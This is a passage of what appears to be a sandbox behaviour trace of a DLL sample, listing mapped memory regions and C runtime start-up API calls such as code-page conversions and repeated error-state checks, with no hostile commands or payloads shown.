0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2700 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 2701 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2702 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2703 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2704 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2705 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2706 start_va = 0x1f0000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2707 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2708 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2709 start_va = 0x1200000 end_va = 0x133ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Thread: id = 128 os_tid = 0xd6c [0035.795] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef91c | out: lpSystemTimeAsFileTime=0x1ef91c*(dwLowDateTime=0xe3051ab0, dwHighDateTime=0x1d3dfba)) [0035.795] GetCurrentProcessId () returned 0xd68 [0035.795] GetCurrentThreadId () returned 0xd6c [0035.795] GetTickCount () returned 0x18120 [0035.795] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef914 | out: lpPerformanceCount=0x1ef914*=375618449) returned 1 [0035.796] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.796] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0035.796] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0035.796] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0035.796] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0035.796] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.796] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.796] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.796] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.796] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.796] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.797] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.797] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.797] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.797] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.797] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.797] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.797] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.797] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.797] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.797] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.798] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.798] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.798] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.798] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.798] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.798] GetCurrentThreadId () returned 0xd6c [0035.798] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllGetClassObject /fn_args=\"iexplore.exe\"" [0035.798] GetEnvironmentStringsW () returned 0x2f79c0* [0035.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0035.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x2309f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0035.798] FreeEnvironmentStringsW (penv=0x2f79c0) returned 1 [0035.798] GetStartupInfoA (in: lpStartupInfo=0x1ef86c | out: lpStartupInfo=0x1ef86c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0035.798] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0035.798] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0035.798] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0035.798] SetHandleCount (uNumber=0x20) returned 0x20 [0035.798] GetLastError () returned 0x0 [0035.799] SetLastError (dwErrCode=0x0) [0035.799] GetLastError () returned 0x0 [0035.799] SetLastError (dwErrCode=0x0) [0035.799] GetLastError () returned 0x0 [0035.799] SetLastError (dwErrCode=0x0) [0035.799] GetACP () returned 0x4e4 [0035.799] GetLastError () returned 0x0 [0035.799] SetLastError (dwErrCode=0x0) [0035.799] IsValidCodePage (CodePage=0x4e4) returned 1 [0035.799] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1ef84c | out: lpCPInfo=0x1ef84c) returned 1 [0035.799] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1ef318 | out: lpCPInfo=0x1ef318) returned 1 [0035.799] GetLastError () returned 0x0 [0035.799] SetLastError (dwErrCode=0x0) [0035.799] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x1ef2a8 | out: lpCharType=0x1ef2a8) returned 1 [0035.799] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef72c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.799] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef72c, cbMultiByte=256, lpWideCharStr=0x1ef098, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0035.799] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x1ef32c | out: lpCharType=0x1ef32c) returned 1 [0035.799] GetLastError () returned 0x0 [0035.799] SetLastError (dwErrCode=0x0) [0035.799] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0035.799] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef72c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.799] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef72c, cbMultiByte=256, lpWideCharStr=0x1ef068, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.799] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.799] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1eee58, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.799] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x1ef62c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x0fo¿õdø\x1e", lpUsedDefaultChar=0x0) returned 256 [0035.799] GetLastError () returned 0x0 [0035.799] SetLastError (dwErrCode=0x0) [0035.799] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef72c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.799] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef72c, cbMultiByte=256, lpWideCharStr=0x1ef088, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.799] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.799] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1eee78, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0035.799] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x1ef52c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x0fo¿õdø\x1e", lpUsedDefaultChar=0x0) returned 256 [0035.800] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.800] GetLastError () returned 0x0 [0035.800] SetLastError (dwErrCode=0x0) [0035.800] GetLastError () returned 0x0 [0035.800] SetLastError (dwErrCode=0x0) [0035.800] GetLastError () returned 0x0 [0035.800] SetLastError (dwErrCode=0x0) [0035.800] GetLastError () returned 0x0 [0035.800] SetLastError (dwErrCode=0x0) [0035.800] GetLastError () returned 0x0 [0035.800] SetLastError (dwErrCode=0x0) [0035.800] GetLastError () returned 0x0 [0035.800] SetLastError (dwErrCode=0x0) [0035.800] GetLastError () returned 0x0 [0035.800] SetLastError (dwErrCode=0x0) [0035.800] GetLastError () returned 0x0 [0035.800] SetLastError (dwErrCode=0x0) [0035.800] GetLastError () returned 0x0 [0035.800] SetLastError (dwErrCode=0x0) [0035.800] GetLastError () returned 0x0 [0035.800] SetLastError (dwErrCode=0x0) [0035.800] GetLastError () returned 0x0 [0035.800] SetLastError (dwErrCode=0x0) [0035.800] GetLastError () returned 0x0 [0035.800] SetLastError (dwErrCode=0x0) [0035.800] GetLastError () returned 0x0 [0035.800] SetLastError (dwErrCode=0x0) [0035.800] GetLastError () returned 0x0 [0035.800] SetLastError (dwErrCode=0x0) [0035.800] GetLastError () returned 0x0 [0035.800] SetLastError (dwErrCode=0x0) [0035.800] GetLastError () returned 0x0 [0035.801] SetLastError (dwErrCode=0x0) [0035.801] GetLastError () returned 0x0 [0035.801] SetLastError (dwErrCode=0x0) [0035.801] GetLastError () returned 0x0 [0035.801] SetLastError (dwErrCode=0x0) [0035.801] GetLastError () returned 0x0 [0035.801] SetLastError (dwErrCode=0x0) [0035.801] GetLastError () returned 0x0 [0035.801] SetLastError (dwErrCode=0x0) [0035.801] GetLastError () returned 0x0 [0035.801] SetLastError (dwErrCode=0x0) [0035.807] GetLastError () returned 0x0 [0035.807] SetLastError (dwErrCode=0x0) [0035.807] GetLastError () returned 0x0 [0035.807] SetLastError (dwErrCode=0x0) [0035.807] GetLastError () returned 0x0 [0035.807] SetLastError (dwErrCode=0x0) [0035.807] GetLastError () returned 0x0 [0035.807] SetLastError (dwErrCode=0x0) [0035.807] GetLastError () returned 0x0 [0035.807] SetLastError (dwErrCode=0x0) [0035.807] GetLastError () returned 0x0 [0035.808] SetLastError (dwErrCode=0x0) [0035.808] GetLastError () returned 0x0 [0035.808] SetLastError (dwErrCode=0x0) [0035.808] GetLastError () returned 0x0 [0035.808] SetLastError (dwErrCode=0x0) [0035.808] GetLastError () returned 0x0 [0035.808] SetLastError (dwErrCode=0x0) [0035.808] GetLastError () returned 0x0 [0035.808] SetLastError (dwErrCode=0x0) [0035.808] GetLastError () returned 0x0 [0035.808] SetLastError (dwErrCode=0x0) [0035.808] GetLastError () returned 0x0 [0035.808] SetLastError (dwErrCode=0x0) [0035.808] GetLastError () returned 0x0 [0035.808] SetLastError (dwErrCode=0x0) [0035.808] GetLastError () returned 0x0 [0035.808] SetLastError (dwErrCode=0x0) [0035.808] GetLastError () returned 0x0 [0035.808] SetLastError (dwErrCode=0x0) [0035.808] GetLastError () returned 0x0 [0035.808] SetLastError (dwErrCode=0x0) [0035.808] GetLastError () returned 0x0 [0035.808] SetLastError (dwErrCode=0x0) [0035.808] GetLastError () returned 0x0 [0035.808] SetLastError (dwErrCode=0x0) [0035.808] GetLastError () returned 0x0 [0035.808] SetLastError (dwErrCode=0x0) [0035.808] GetLastError () returned 0x0 [0035.808] SetLastError (dwErrCode=0x0) [0035.808] GetLastError () returned 0x0 [0035.808] SetLastError (dwErrCode=0x0) [0035.808] GetLastError () returned 0x0 [0035.808] SetLastError (dwErrCode=0x0) [0035.808] GetLastError () returned 0x0 [0035.808] SetLastError (dwErrCode=0x0) [0035.809] GetLastError () returned 0x0 [0035.809] SetLastError (dwErrCode=0x0) [0035.809] GetLastError () returned 0x0 [0035.809] SetLastError (dwErrCode=0x0) [0035.809] GetLastError () returned 0x0 [0035.809] SetLastError (dwErrCode=0x0) [0035.809] GetLastError () returned 0x0 [0035.809] SetLastError (dwErrCode=0x0) [0035.809] GetLastError () returned 0x0 [0035.809] SetLastError (dwErrCode=0x0) [0035.809] GetLastError () returned 0x0 [0035.809] SetLastError (dwErrCode=0x0) [0035.809] GetLastError () returned 0x0 [0035.809] SetLastError (dwErrCode=0x0) [0035.809] GetLastError () returned 0x0 [0035.809] SetLastError (dwErrCode=0x0) [0035.809] GetLastError () returned 0x0 [0035.809] SetLastError (dwErrCode=0x0) [0035.809] GetLastError () returned 0x0 [0035.809] SetLastError (dwErrCode=0x0) [0035.809] GetLastError () returned 